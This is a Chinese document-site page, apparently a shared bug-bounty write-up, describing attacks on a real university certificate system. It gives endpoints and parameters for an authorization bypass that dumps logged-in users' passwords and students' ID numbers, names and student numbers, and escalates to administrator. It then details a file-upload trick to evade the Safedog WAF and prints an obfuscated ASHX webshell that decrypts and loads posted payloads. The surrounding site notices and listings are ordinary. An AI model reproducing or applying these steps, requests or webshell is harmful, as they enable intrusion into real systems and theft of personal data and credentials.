原创力文档- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
月球出事,知识星球以后由我更新没收一分钱勿喷只是他出事的时候给我交
代让我帮忙更新点,有些是库存历史洞了
漏洞点1:越权
url:
某开大学证书站(同系统不同站思路一样)
通过superadmin账号登录获取日志接口信息
password替换成
ecfe6335568d9aa8fxxxxxxxd92bca
日志接口获取所有登录过的账号和密码
post/sys/log/loadLogLoginAndOutList
rows=10page=2order=ascremote_ip=username=startTime=endTi
me=
拿获取的学生账号登录
15xxxxxx
3a453xxxxxxxxxxxx1eef6d9
接口获取学生个人信息,身份证+姓名+学号
/gradms/base/infoStutrainInfo/loadInfoStutrainInfoList?state=1
GET改为POST传输
rows=10page=1order=ascorgCode=majorUniqueId=grade=perNu
m=perName=
page是页数
POST/auth/switchPosition
positionId=1
直接成为管理员
漏洞点2:文件上传GetShell
漏洞点1:
网站存在一处上传
WAF是安全狗的头像处
先上传一个11.jpg的文件,然后抓包的时候改成11.html.ashx
然后记住104DCCCA002D5F067BFD970D2CF37410这样就绕过检测
直接上传11.ashx会waf拦截
然后继续吧得到的Ticket替换之前成11.html.ashx的
然后插入免杀一句话,11.jpg改成11.html.ashx并且替换ticket改成
104DCCCA002D5F067BFD970D2CF37410
WAF检测文件名和内容
这里用到两个脚本一个是ashx免杀马
一个是生成文件的马,都能绕过安全狗检测
ashx马:
%@Language=C#Class=Handler1%
publicclassHandler1:
System.Web.IHttpHandler,System.Web.SessionState.IRequiresSessionState
{
publicvoidProcessRequest(System.Web.HttpContextContext){try{string
key=202cb962ac59075b;stringpass=123;stringmd5=
System.BitConverter.ToString(new
System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash(Syst
em.Text.Encoding.Default.GetBytes(pass+key))).Replace(-,);byte[]
data=System.Convert.FromBase64String(Context.Request[pass]);data=new
System.Security.Cryptography.RijndaelManaged().CreateDecryptor(System.Te
xt.Encoding.Default.GetBytes(key),
System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(data,0,
data.Length);if(Context.Session[payload]==null){
Context.Session[payload]=
(System.Reflection.Assembly)typeof(System.Reflection.Assembly).GetMethod
(Load,newSystem.Type[]{typeof(byte[])}).Invoke(null,newobject[]
{data});;}else{objecto=
((System.Reflection.Assembly)Context.Session[payload]).CreateInstance(
LY);o.Equals(Context);o.Equals(data);byte[]
您可能关注的文档
- 2024《国家危险废物名录(修订稿)(征求意见稿)》修订内容对照表.docx
- 关于发布-2023 年国家生态环境监测标准预研究项目清单(第二批)的通知.docx
- 信息安全资料29第二章第4节信息安全渗透测试.pdf
- 信息安全资料OWASP大模型安全Top 10分析与实践.pdf
- 信息安全资料张晓阳-DevSecOps安全提效与质量管控.pdf
- 信息安全资料欧盟数据三法联动对美企及非欧盟企业的影响.pdf
- 信息安全资料2025红蓝对抗网络安全意识培训-第02讲.攻击队的常见网络攻击手段.pdf
- 信息安全资料陈宇庆-2025CDIE-PPTRolland.pdf
- 信息安全资料欧盟人工智能法案全面解读2核心概念解析.pdf
- 信息安全资料31第二章第6节信息安全运维服务.pdf
- 信息安全资料中野学--制造业AI化的安全基石:构建可信智能终端的全球实践.pdf
- 信息安全资料盟AI法案全面5AI保障.pdf
- 信息安全资料从合规到信任构建数据隐私成熟度体系的路径.pdf
- 信息安全资料制定强大的AI安全和治理计划.pdf
- 信息安全资料7-【数字安全大会】 《中国数字安全产业年度报告(2025)》发布与解读-数世咨询高级分析师 刘宸宇.pdf
- 信息安全资料法律不确定时期的伦理管理实践.pdf
- 信息安全资料技术赋能与数据最小化平衡之道.pdf
- 信息安全资料恶意挖矿程式防御指南(1).pdf
- 信息安全资料恶意挖矿程式防御指南.pdf
- 信息安全资料OWASP LLM应用程序十大安全风险(2025).pdf
最近下载
- 化工原理(第四版)上册_谭天恩课后习题答案.docx VIP
- 基于PLC的水稻硬盘育秧全自动起盘机控制系统设计与实现.pdf
- 光伏项目危险源辨识、风险评价表及重要危险源清单(光伏区).docx VIP
- GSK980TDb_车床CNC使用手册.pdf VIP
- 高中语文选择性必修下册全册教案.docx VIP
- 自动化技术《伺服控制系统(运动控制类)》2024-2025学年春学期专项复习试卷及答案.doc VIP
- 2025广西公需科目题目(“一区两地一园一通道”)(习题与答案).doc VIP
- 2025年伺服系统考试题库及答案.doc VIP
- 襄阳城市介绍PPT.pptx VIP
- 伺服运动控制试卷南阳理工学院带答案.pdf VIP
文档评论(0)